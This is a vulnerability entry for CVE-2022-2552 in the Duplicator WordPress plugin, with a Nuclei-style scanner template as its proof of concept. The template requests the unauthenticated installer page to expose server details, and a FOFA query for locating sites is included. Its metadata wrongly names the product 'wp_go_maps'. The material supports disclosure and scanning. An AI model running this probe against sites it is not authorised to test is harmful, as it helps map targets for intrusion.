漏洞描述
The Duplicator WordPress plugin before 1.4.7 does not authenticate or authorize visitors before displaying information about the system such as server software, php version and full file system path to the site.
CVE-2022-2552: Duplicator < 1.4.7.1 - Information Disclosure
PoC代码[已公开]
id: CVE-2022-2552
info:
name: Duplicator < 1.4.7.1 - Information Disclosure
author: iamnoooob,ritikchaddha
severity: medium
description: |
The Duplicator WordPress plugin before 1.4.7 does not authenticate or authorize visitors before displaying information about the system such as server software, php version and full file system path to the site.
reference:
- https://wpscan.com/vulnerability/6b540712-fda5-4be6-ae4b-bd30a9d9d698/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2552
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-2552
cwe-id: CWE-862
epss-score: 0.5385
epss-percentile: 0.97927
cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:*
metadata:
verified: true
max-request: 1
fofa-query: body="/wp-content/plugins/duplicator"
vendor: snapcreek
product: wp_go_maps
tags: cve,cve2022,wp,wp-plugin,wordpress,duplicator,disclosure
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?view=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'SERVER DETAILS</div>'
- 'Setup Information'
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502206ca5870ecf362bd8b9f125f5e136b2b88b104d0bf59bc58ce6039e35e956f5b50221008b9a462d386fa7f1ae61fbfa448f8c29251d409b0498c6ec9d1a19f924bec4e4:922c64590222798bb761d5b6d8e72950